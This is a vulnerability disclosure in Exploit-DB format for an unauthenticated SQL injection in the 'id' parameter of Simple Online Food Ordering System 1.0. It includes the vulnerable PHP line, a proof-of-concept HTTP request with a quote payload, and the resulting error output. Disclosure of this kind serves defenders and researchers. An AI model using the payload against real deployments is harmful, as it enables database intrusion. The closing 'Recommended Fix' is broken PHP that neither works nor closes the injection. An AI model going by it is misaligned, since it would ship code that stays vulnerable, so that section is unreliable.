56 lines
No EOL
1.7 KiB
Text
56 lines
No EOL
1.7 KiB
Text
# Exploit Title: Simple Online Food Ordering System 1.0 - 'id' SQL Injection (Unauthenticated)
|
|
# Google Dork: N/A
|
|
# Date: 2020-09-22
|
|
# Exploit Author: Eren 'Aporlorxl23' Şimşek
|
|
# Vendor Homepage: https://www.sourcecodester.com/php/14460/simple-online-food-ordering-system-using-phpmysql.html
|
|
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/simple-online-food-ordering-system-using-php.zip
|
|
# Version: 1.0
|
|
# Tested on: Linux - XAMPP Server
|
|
# CVE : N/A
|
|
|
|
# Vulnerable Source Code:
|
|
# /view_prod.php
|
|
# [3] $qry = $conn->query("SELECT * FROM product_list where id =
|
|
".$_GET['id'])->fetch_array();
|
|
|
|
# PoC:
|
|
|
|
# Request:
|
|
|
|
GET /view_prod.php?id=' HTTP/1.1
|
|
Host: localhost
|
|
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
|
|
Accept: */*
|
|
Accept-Language: tr,en-US;q=0.7,en;q=0.3
|
|
Accept-Encoding: gzip, deflate
|
|
Connection: close
|
|
|
|
# Response:
|
|
|
|
HTTP/1.1 200 OK
|
|
Date: Tue, 22 Sep 2020 20:44:48 GMT
|
|
Server: Apache/2.4.43 (Unix) OpenSSL/1.1.1g PHP/7.4.7 mod_perl/2.0.11
|
|
Perl/v5.30.3
|
|
X-Powered-By: PHP/7.4.7
|
|
Content-Length: 234
|
|
Connection: close
|
|
Content-Type: text/html; charset=UTF-8
|
|
|
|
<br />
|
|
<b>Fatal error</b>: Uncaught Error: Call to a member function
|
|
fetch_array() on bool in /opt/lampp/htdocs/view_prod.php:3
|
|
Stack trace:
|
|
#0 {main}
|
|
thrown in <b>/opt/lampp/htdocs/view_prod.php</b> on line <b>3</b><br />
|
|
|
|
# As You Can See Here PHP Fatal Error Because
|
|
# $qry = $conn->query("SELECT * FROM product_list where id =
|
|
"')->fetch_array();
|
|
# id Value ' This is Wrong Syntax.
|
|
|
|
# Recommended Fix:
|
|
|
|
You Will Use `mysqli_real_escape_string` On id . And query Will Same With :
|
|
$qry = $conn->query('SELECT * FROM product_list where id
|
|
="$_GET['id']"')->fetch_array();
|
|
Because Here Not Used "" This is Imported. |